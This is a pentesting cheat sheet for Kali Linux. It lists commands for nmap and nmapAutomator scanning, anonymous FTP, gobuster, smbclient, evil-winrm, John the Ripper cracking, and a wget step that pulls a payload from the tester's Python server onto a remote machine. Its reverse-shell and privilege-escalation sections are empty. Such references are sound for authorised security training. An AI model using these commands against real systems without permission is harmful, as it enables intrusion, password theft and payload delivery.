# Offensive Security Tools
***
Here you will find a useful collection of commands and file resource locations used in Pentesting operations. This reference is will go hand in hand with Kali Linux.
***
# General Enumeration
***
## NMAP
```bash
# A network scanning tool that identifies devices, ports, services, and operating systems
# Download: Pre-installed on Kali Linux
# Usage
nmap -p- --min-rate 5000 -sC -sV {IP ADDRESS}
# -p-: scans ALL ports
# --min-rate : Send packets no slower than per second
# -sC: equivalent to --script=default
# -sV: Probe open ports to determine service/version info
```
## NMAP Automator
```bash
# Useful script that automates multiple enumeration scans in succession
# Download: [nmapAutomator.sh](https://github.com/21y4d/nmapAutomator/blob/master/nmapAutomator.sh)
./nmapAutomator.sh --host {IP ADDRESS} --type All
# --type Network : Shows all live hosts in the host's network (~15 seconds)
# --type Port : Shows all open ports (~15 seconds)
# --type Script : Runs a script scan on found ports (~5 minutes)
# --type Full : Runs a full range port scan, then runs a thorough scan on new ports (~5-10 minutes)
# --type UDP : Runs a UDP scan "requires sudo" (~5 minutes)
# --type Vulns : Runs CVE scan and nmap Vulns scan on all found ports (~5-15 minutes)
# --type Recon : Suggests recon commands, then prompts to automatically run them
# --type All : Runs all the scans (~20-30 minutes)
```
***
# Port Enumeration
***
## FTP [21]
### ftp
```bash
# Connect to FTP server
# Download: Pre-installed on Kali Linux
# Usage
ftp {IP ADDRESS}
# Default Credentials: anonymous
# Directory Command: dir
# Download Command: get
# Upload Command: put
```
## SSH [22]
## DNS [53]
## FINGER [79]
## Web Server [80, 443]
### gobuster
**OVERVIEW**
| | |
| :-----------: | :-----------: |
| Description | Brute Forcing Web Directories|
| Notes | Not recursive, only digs one level deep |
| Download | Pre-installed on Kali Linux |
**USAGE**
```bash
gobuster dir -u {IP ADDRESS} -w /usr/share/wordlists/dirb/common.txt
```
**ALTERNATIVE WORD LISTS**
```bash
┌──(kali㉿kali)-[/usr/share/wordlists/dirb]
big.txt
catala.txt
common.txt
euskera.txt
extensions_common.txt
indexes.txt
mutations_common.txt
others
small.txt
spanish.txt
stress
vulns
┌──(kali㉿kali)-[/usr/share/wordlists/dirbuster]
apache-user-enum-1.0.txt
apache-user-enum-2.0.txt
directories.jbrofuzz
directory-list-1.0.txt
directory-list-2.3-small.txt
directory-list-lowercase-2.3-small.txt
directory-list-2.3-medium.txt
directory-list-lowercase-2.3-medium.txt
```
## Kerberos [88]
## POP3 [110]
## SNMP [161]
## LDAP [389]
## SMB [445]
### smbclient
**OVERVIEW**
| | |
| :-----------: | :-----------: |
| Description | Connect to SMB |
| Download | Pre-installed on Kali Linux |
**USAGE**
```bash
# List all SMB Shares
smbclient -L {TARGET_IP}
# Authenticate with local credentials
smbclient -N \\\\{TARGET_IP}\\{SHARE}
# Authenticate with Administrator
smbclient -N \\\\{TARGET_IP}\\{SHARE} -u Administrator
```
## MSSQL [1433]
## NFS [2049]
## RDP [3389]
## WINRM [5985, 5986]
**OVERVIEW**
| | |
| :-----------: | :-----------: |
| Description | A tool used to hack WINRM from a linux console |
| Download | Pre-installed on Kali Linux |
**USAGE**
```bash
evil-winrm -i {IP ADDRESS} -u {USERNAME} -p {PASSWORD}
```
# Password Cracking
***
## John The Ripper
**OVERVIEW**
| | |
| :-----------: | :-----------: |
| Description | Password/hash cracking tool |
| Download | Pre-installed on Kali Linux |
**USAGE**
```bash
john -w=/usr/share/wordlists/rockyou.txt {file.txt}
```
# Payload File Transfer
***
## Python Server [1]
**USAGE**
```bash
# Host a personal server on client machine
sudo python3 -m http.server {PORT}
# {PORT}: Port to open for transfer
```
## WGET [2]
**USAGE**
```bash
# Download files on the remote machine
wget http://{IP ADDRESS}/{FILE} -outfile {FILE}
# {IP ADDRESS}: Python Server IP Address
# {FILE}: The payload to be trasnfered
```
# Privilege Escalation
## Linux
## Windows
# Reverse Shell
## Linux
## Windows